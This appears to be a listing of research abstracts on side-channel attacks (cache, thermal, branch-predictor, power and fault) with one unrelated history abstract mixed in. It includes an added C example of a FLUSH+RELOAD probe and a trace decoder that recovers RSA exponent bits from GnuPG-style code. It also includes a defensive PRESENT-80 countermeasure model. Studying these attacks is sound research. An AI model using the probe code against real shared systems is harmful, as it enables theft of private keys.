On the Security of Practical Mail User Agents against Cache Side-Channel Attacks

2020 ◽  
Vol 10 (11) ◽  
pp. 3770
Author(s):  
Hodong Kim ◽  
Hyundo Yoon ◽  
Youngjoo Shin ◽  
Junbeom Hur

Mail user agent (MUA) programs provide an integrated interface for email services. Many MUAs support email encryption functionality to ensure the confidentiality of emails. In practice, they encrypt the content of an email using email encryption standards such as OpenPGP or S/MIME, mostly implemented using GnuPG. Despite their widespread deployment, there has been insufficient research on their software structure and the security dependencies among the software components of MUA programs. In order to understand the security implications of the structures and analyze any possible vulnerabilities of MUA programs, we investigated a number of MUAs that support email encryption. As a result, we found severe vulnerabilities in a number of MUAs that allow cache side-channel attacks in virtualized desktop environments. Our analysis reveals that the root cause originates from the lack of verification and control over the third-party cryptographic libraries that they adopt. In order to demonstrate this, we implemented a cache side-channel attack on RSA in GnuPG and then conducted an evaluation of the vulnerability of 13 MUAs that support email encryption in Ubuntu 14.04, 16.04 and 18.04. Based on our experiment, we found that 10 of these MUA programs (representing approximately 77% of existing MUA programs) allow the installation of a vulnerable version of GnuPG, even when the latest version of GnuPG, which is secure against most cache side-channel attacks, is in use. In order to substantiate the importance of the vulnerability we discovered, we conducted a FLUSH+RELOAD attack on these MUA programs and demonstrated that the attack restored 92% of the bits of the 2048-bit RSA private key when the recipients read a single encrypted email.
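The abstract names FLUSH+RELOAD against RSA in GnuPG but, being an abstract, does not show the mechanics. The following is an added example written for this page, not the authors' attack code: `probe()` is the x86 timing primitive (reload, time with `rdtscp`, then `clflush` for the next slot), and the decoder turns a trace of "which of the Square / Multiply / Reduce code lines was touched in this time slot" into exponent bits. It assumes (as in the classic FLUSH+RELOAD attack on GnuPG 1.4) a left-to-right square-and-multiply exponentiation in which every bit performs Square, Reduce and a 1-bit additionally performs Multiply, Reduce; the 150-cycle hit threshold and the trace string are constructed assumptions.

```c
/* Added example: FLUSH+RELOAD probe primitive plus the trace-to-bits decoder
 * for left-to-right square-and-multiply RSA (assumed victim structure). */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

#define HIT_THRESHOLD 150   /* cycles; assumption, must be calibrated per machine */

/* Time one reload of *addr, then flush it again for the next slot.
 * Returns 0 on non-x86 builds so the decoder below can still be exercised. */
static uint64_t probe(const void *addr) {
#if defined(__x86_64__) || defined(__i386__)
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*(volatile const char *)addr;          /* the reload being timed */
    uint64_t t1 = __rdtscp(&aux);
    _mm_clflush(addr);                           /* evict for the next probe */
    return t1 - t0;
#else
    (void)addr;
    return 0;
#endif
}

/* Classify one slot from the three probe times: the fastest line under the
 * threshold was just executed by the victim; '?' if none was (victim elsewhere
 * or descheduled). */
char classify_slot(uint64_t t_sq, uint64_t t_mul, uint64_t t_red, uint64_t threshold) {
    char op = '?';
    uint64_t best = threshold;
    if (t_sq  < best) { best = t_sq;  op = 'S'; }
    if (t_mul < best) { best = t_mul; op = 'M'; }
    if (t_red < best) { best = t_red; op = 'R'; }
    return op;
}

/* Decode a slot trace such as "SSRRMMRRSSRR" into exponent bits (MSB first).
 * Consecutive identical observations are one operation (the probe period is
 * shorter than a multiply), '?' slots are skipped, and an 'M' between two 'S'
 * means the bit is 1. Two back-to-back squarings whose Reduce was missed merge
 * into one, which is one reason real attacks recover less than 100% of bits.
 * Returns the number of bits written. */
size_t decode_bits(const char *trace, uint8_t *bits, size_t max_bits) {
    size_t n = 0;
    int in_bit = 0, saw_mul = 0;
    char prev = 0;
    for (const char *p = trace; *p; p++) {
        char c = *p;
        if (c == '?' || c == prev) continue;     /* noise, or same op continuing */
        prev = c;
        if (c == 'S') {                          /* a squaring starts a new bit */
            if (in_bit && n < max_bits) bits[n++] = (uint8_t)saw_mul;
            in_bit = 1; saw_mul = 0;
        } else if (c == 'M') {
            saw_mul = 1;
        }
    }
    if (in_bit && n < max_bits) bits[n++] = (uint8_t)saw_mul;
    return n;
}

/* Convenience: decode a trace and compare with an expected bit string like "101". */
int decode_matches(const char *trace, const char *expected) {
    uint8_t bits[4096];
    size_t n = decode_bits(trace, bits, sizeof bits);
    size_t i = 0;
    for (; i < n && expected[i]; i++)
        if (bits[i] != (uint8_t)(expected[i] - '0')) return 0;
    return i == n && expected[i] == '\0';
}

int main(void) {
    static char buf[64];
    printf("cold probe: %llu cycles, warm probe: %llu cycles\n",
           (unsigned long long)probe(buf), (unsigned long long)probe(buf));
    /* Constructed trace: bit 1 (S R M R), bit 0 (S R), bit 1 with a gap (S R ? M R). */
    const char *trace = "SSRRMMRRSSRRSSRR??MMRR";
    uint8_t bits[8];
    size_t n = decode_bits(trace, bits, sizeof bits);
    printf("recovered %zu bits:", n);
    for (size_t i = 0; i < n; i++) printf(" %u", bits[i]);
    printf("\n");
    return 0;
}
```

On a real target the three probed addresses are the cache lines of the square, multiply and modular-reduce routines inside the shared GnuPG binary; the slot loop calls `probe()` on each, feeds the times to `classify_slot()`, and the resulting string goes to `decode_bits()`.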

2021 ◽  
Vol 13 (6) ◽  
pp. 146
Author(s):  
Somdip Dey ◽  
Amit Kumar Singh ◽  
Klaus McDonald-Maier

Side-channel attacks remain a challenge to information flow control and security in mobile edge devices to this day. One such security flaw can be exploited through temperature side-channel attacks, where heat dissipation and propagation from the processing cores are observed over time in order to deduce security flaws. In this paper, we study how computer vision-based convolutional neural networks (CNNs) can be used to mount a temperature (thermal) side-channel attack on different Linux governors in a mobile edge device built on a multi-processor system-on-chip (MPSoC). We also designed a power- and memory-efficient CNN model that is capable of performing a thermal side-channel attack on the MPSoC and can be used by industry practitioners and academics as a benchmark for designing methodologies to secure an MPSoC against such an attack.


Author(s):  
Bharati Ainapure ◽  
Deven Shah ◽  
A. Ananda Rao

Cloud computing supports multitenancy to satisfy users' demands for accessing resources, and at the same time it increases revenue for cloud providers. Cloud providers adopt multitenancy by virtualizing resources such as CPU, network interfaces, peripherals, hard drives and memory using a hypervisor to fulfil the demand. In a virtualized environment, many virtual machines (VMs) can run on the same core with the help of the hypervisor by sharing the resources. The VMs running on the same core are targets for malicious or abnormal attacks such as side channel attacks. Among the various side channel attacks in cloud computing, the cache-based side channel attack is one that leaks private information of the users through the shared resources. Here, as the shared resource is the cache, a process can exploit the cache usage of another through cache contention. Cache sharing gives attackers a way to gain considerable information, so that the key used for encryption can be inferred. Discovering this side channel attack is a challenging task. This requires identification of a feature that influences the attack. Even though various techniques are available in the literature to mitigate such attacks, an effective solution to reduce the cache-based side channel attack is still an open issue. Therefore, a novel fuzzy rule-based mechanism is integrated to detect cache side channel attackers by monitoring the cache data access (CDA). The factor that determines the attack is the CDA in a log file created by the framework during authorization. The proposed framework also utilizes certain security properties, including ECC and hashing, for privacy preservation, and the decision is made with the aid of a fuzzy logic system.


2014 ◽  
Vol 1044-1045 ◽  
pp. 1498-1502 ◽  
Author(s):  
Hong Sheng Wang ◽  
Dao Gang Ji ◽  
Yang Zhang ◽  
Kai Yan Chen ◽  
Kai Song

Cipher chips, such as microprocessors, play an important role in most cryptosystems and implement many public cryptographic algorithms. However, side channel attacks pose serious threats to cipher chips. The optical side channel attack is a new kind of method against cipher chips. Two methods are presented in this paper, which show how to implement optical fault injection attacks against the RSA and AES algorithms running on the AT89C52 microchip, and demonstrate how to extract secret information under attack.


2020 ◽  
Author(s):  
Somdip Dey ◽  
Amit Kumar ◽  
Klaus D. Mcdonald-Maier

Side-channel attacks remain a challenge to information flow control and security in mobile edge devices to this day. One such security flaw can be exploited through temperature side-channel attacks, where heat dissipation and propagation from the processing cores are observed over time in order to deduce security flaws. In this brief, we study how computer vision-based convolutional neural networks (CNNs) can be used to mount a temperature (thermal) side-channel attack on different Linux governors in a mobile edge device built on a multi-processor system-on-chip (MPSoC). We also designed a power- and memory-efficient CNN model that is capable of performing a thermal side-channel attack on the MPSoC and can be used by industry practitioners and academics as a benchmark for designing methodologies to secure an MPSoC against such an attack.


2018 ◽  
Vol 2018 ◽  
pp. 1-14 ◽  
Author(s):  
Qi Zhang ◽  
An Wang ◽  
Yongchuan Niu ◽  
Ning Shang ◽  
Rixin Xu ◽  
...  

The identity-based cryptographic algorithm SM9, which became the main part of the ISO/IEC 14888-3/AMD1 standard in November 2017, employs the identities of users to generate public-private key pairs. Without the support of digital certificates, it has been applied to cloud computing, cyber-physical systems, the Internet of Things, and so on. In this paper, the implementation of the SM9 algorithm and its Simple Power Attack (SPA) are discussed. Then, we present a template attack and a fault attack on SPA-resistant SM9. Our experiments have proved that if attackers mount the template attack on an 8-bit microcontroller unit, the secret key can be revealed by having the device execute the algorithm only once. The fault attack even allows the attackers to obtain the 256-bit key of SM9 by performing the algorithm twice and analyzing the two different results. Accordingly, some countermeasures to resist the three kinds of attacks above are given.


Author(s):  
Tianlin Huo ◽  
Xiaoni Meng ◽  
Wenhao Wang ◽  
Chunliang Hao ◽  
Pei Zhao ◽  
...  

Software Guard Extensions (SGX) is a hardware-based trusted execution environment (TEE) implemented in recent Intel commodity processors. By isolating the memory of security-critical applications from untrusted software, this mechanism provides users with a strongly shielded environment, called an enclave, for executing programs safely. However, recent studies have demonstrated that SGX enclaves are vulnerable to side-channel attacks. In order to deal with these attacks, several protection techniques have been studied and deployed. In this paper, we explore a new pattern history table (PHT) based side-channel attack against SGX named Bluethunder, which can bypass existing protection techniques and reveal secret information inside an enclave. Compared to existing PHT-based attacks (such as Branchscope [ERAG+18]), Bluethunder abuses the 2-level directional predictor in the branch prediction unit, on top of which we develop an exploitation methodology to disclose the input-dependent control flow in an enclave. Since the cost of training the 2-level predictor is quite low, Bluethunder can achieve a high bandwidth during the attack. We evaluate our attacks on two case studies: extracting the format string information in the vfprintf function in the Intel SGX SDK, and attacking the implementation of the RSA decryption algorithm in mbed TLS. Both attacks show that Bluethunder can recover fine-grained information inside an enclave with low training overhead, outperforming the latest PHT-based side channel attack (Branchscope) by 52×. Specifically, in the second attack, Bluethunder can recover the RSA private key with 96.76% accuracy in a single run.


2021 ◽  
pp. 9-36
Author(s):  
Gayane Makhmourian

NAKHIJEVAN REGION IN THE CONTEXT OF THE TREATY OF MOSCOW AND OF THE RUSSIAN–TURKISH–AZERBAIJANIAN RELATIONS IN 1920-1921

As it was necessary for Kemalist Turkey to abolish the results of the Treaty of Sèvres, it came to an understanding with Soviet Russia and gained the assistance of its Red Army. Thus, the Turkish detachments returned to Nakhijevan on July 28, 1920, though they had been driven out of it earlier by the forces of the Republic of Armenia. The latter agreed to consider this district a "contestable" territory and accepted the deployment of the Bolshevik Army in it. Taking into account the fatal course of the Turkish-Armenian War of 1920, official Yerevan did not reject on October 28 the future referendum in Nakhijevan, and the RSFSR accepted the unshakeable right of Armenia in regard to this district. However, the Alexandropol Treaty was signed on December 2, and the Republic of Armenia referred the conduct of the referendum and control over the whole area to the Turkish Army. This Treaty deprived Armenia of its sovereign rights regarding Nakhijevan. The subsequent stubbornness of Turkey, together with its contribution to the Sovietization of Azerbaijan, produced the Treaty of Moscow, signed on March 16/18, 1921. This transaction grossly violated international law and, without the participation of the third party, independent (though sovietized, yet mutinous) Armenia, transferred trusteeship over Nakhijevan to Azerbaijan. On October 13, 1921, Armenia received a tiny territorial cession, sanctioned the Treaty of Kars and recognized the new status of Nakhijevan.


2012 ◽  
Vol 546-547 ◽  
pp. 1489-1494
Author(s):  
Yi Kun Hu ◽  
Zun Yang Qin

Among the block cipher algorithms, AES or DES is an excellent and preferred choice for most block cipher applications. But AES and DES are not very suitable for hardware implementation because of their high cost: they require large routing areas and their processing efficiency is relatively low. So lightweight cipher algorithms came into being, among which PRESENT is very competitive. Following the structure of the message authentication algorithm ALRED, a new family of Tunable Lightweight MACs based on PRESENT has been proposed, namely TuLP. However, PRESENT is not able to resist side channel attacks, and so, of course, neither is TuLP. For the above reason, in this paper we provide an improvement of PRESENT by inserting random dummy cycles as well as shuffling to strengthen the security of PRESENT against side channel attacks. We implement PRESENT and TuLP in Verilog and simulate them on the Xilinx ISim platform. Finally, we provide the power analysis from Xilinx XPower.
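The abstract describes the countermeasure only by name (random dummy cycles and shuffling). The following is an added software model written for this page, not the authors' Verilog: a PRESENT-80 encryption whose S-box layer either runs in fixed nibble order (the leaky reference) or, when protection is enabled, processes the sixteen nibbles in a random order with zero to three dummy S-box lookups inserted around each real one, so that the moment a given nibble is processed no longer lines up with a fixed point of the power trace. The randomness source is a small xorshift generator with a fixed seed (an assumption for reproducibility; a real design would use a TRNG), and `unsigned __int128` is used to hold the 80-bit key register. The ciphertexts are checked against the test vectors from the PRESENT specification, so the protected variant is shown to be functionally identical.

```c
/* Added example: PRESENT-80 with hiding countermeasures (shuffled S-box order
 * and random dummy S-box evaluations) modelled in C. Not the paper's code. */
#include <stdint.h>
#include <stdio.h>

typedef unsigned __int128 u128;                  /* 80-bit key lives in the low 80 bits */
static const u128 KEY_MASK = ((u128)1 << 80) - 1;

static const uint8_t SBOX[16] = {0xC,0x5,0x6,0xB,0x9,0x0,0xA,0xD,
                                 0x3,0xE,0xF,0x8,0x4,0x7,0x1,0x2};

/* xorshift64 with a fixed seed: deterministic for the example, NOT cryptographic
 * and NOT what a hardware implementation would use (assumption). */
static uint64_t rng_state = 0x9E3779B97F4A7C15ull;
static uint32_t rnd(void) {
    uint64_t x = rng_state;
    x ^= x << 13; x ^= x >> 7; x ^= x << 17;
    rng_state = x;
    return (uint32_t)(x >> 32);
}

/* Reference S-box layer: fixed nibble order, no dummy operations. */
static uint64_t sbox_layer_plain(uint64_t s) {
    uint64_t out = 0;
    for (int n = 0; n < 16; n++)
        out |= (uint64_t)SBOX[(s >> (4 * n)) & 0xF] << (4 * n);
    return out;
}

/* Protected S-box layer: Fisher-Yates shuffle of the nibble order plus 0..3
 * dummy S-box lookups before every real one. Output equals the plain layer. */
static uint64_t sbox_layer_hiding(uint64_t s) {
    uint8_t order[16];
    for (int i = 0; i < 16; i++) order[i] = (uint8_t)i;
    for (int i = 15; i > 0; i--) {
        int j = (int)(rnd() % (uint32_t)(i + 1));
        uint8_t t = order[i]; order[i] = order[j]; order[j] = t;
    }
    volatile uint8_t sink = 0;                   /* dummy results land here, unused */
    uint64_t out = 0;
    for (int i = 0; i < 16; i++) {
        for (uint32_t d = rnd() & 3; d > 0; d--) sink = SBOX[rnd() & 0xF];
        int n = order[i];
        out |= (uint64_t)SBOX[(s >> (4 * n)) & 0xF] << (4 * n);
    }
    (void)sink;
    return out;
}

/* pLayer: bit i moves to position (16*i) mod 63 for i < 63; bit 63 stays. */
static uint64_t p_layer(uint64_t s) {
    uint64_t out = 0;
    for (int i = 0; i < 63; i++) out |= ((s >> i) & 1) << ((16 * i) % 63);
    return out | (s & (1ull << 63));
}

/* Key schedule: rotate left 61, S-box on the top nibble, XOR the round
 * counter into bits 19..15. */
static u128 key_update(u128 k, unsigned round) {
    k = ((k << 61) | (k >> 19)) & KEY_MASK;
    u128 top = SBOX[(uint8_t)((k >> 76) & 0xF)];
    k = (k & ~((u128)0xF << 76)) | (top << 76);
    return k ^ ((u128)round << 15);
}

/* protect = 0: plain S-box layer; protect = 1: shuffled + dummy cycles. */
uint64_t present80_encrypt(uint64_t pt, u128 key, int protect) {
    u128 k = key & KEY_MASK;
    uint64_t s = pt;
    for (unsigned r = 1; r <= 31; r++) {
        s ^= (uint64_t)(k >> 16);                /* round key = leftmost 64 bits */
        s = protect ? sbox_layer_hiding(s) : sbox_layer_plain(s);
        s = p_layer(s);
        k = key_update(k, r);
    }
    return s ^ (uint64_t)(k >> 16);              /* final whitening with K32 */
}

int main(void) {
    uint64_t c0 = present80_encrypt(0, 0, 0);
    uint64_t c1 = present80_encrypt(0, 0, 1);
    printf("plain     : %016llx\nprotected : %016llx (spec: 5579c1387b228445)\n",
           (unsigned long long)c0, (unsigned long long)c1);
    return c0 == c1 ? 0 : 1;
}
```

Shuffling and dummy cycles are hiding, not masking: they raise the number of traces an attacker needs by randomizing alignment, and an attacker who can re-align traces (or who targets the key schedule, which is left unprotected here) recovers the original leakage, so in practice they are combined with masking rather than used alone.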


2020 ◽  
Vol 2020 ◽  
pp. 1-10
Author(s):  
Omar Abou Selo ◽  
Maan Haj Rachid ◽  
Abdullatif Shikfa ◽  
Yongge Wang ◽  
Qutaibah Malluhi

Private Function Evaluation (PFE) is the problem of evaluating one party’s private data using a private function owned by another party. Existing solutions for PFE are based on universal circuits evaluated in secure multiparty computations or on hiding the circuit’s topology and the gate’s functionality through additive homomorphic encryption. These solutions, however, are not efficient enough for practical use; hence there is a need for more efficient techniques. This work looks at utilizing the Intel Software Guard Extensions platform (SGX) to provide a more practical solution for PFE where the privacy of the data and the function are both preserved. Notably, our solution carefully avoids the pitfalls of side-channel attacks on SGX. We present solutions for two different scenarios: the first is when the function’s owner has an SGX-enabled device and the other is when a third party (or one of the data owners) has the SGX capability. Our results show a clear expected advantage in terms of running time for the first case over the second. Investigating the slowdown in the second case leads to the garbling time which constitutes more than 60% of the consumed time. Both solutions clearly outperform FairplayPF in our tests.

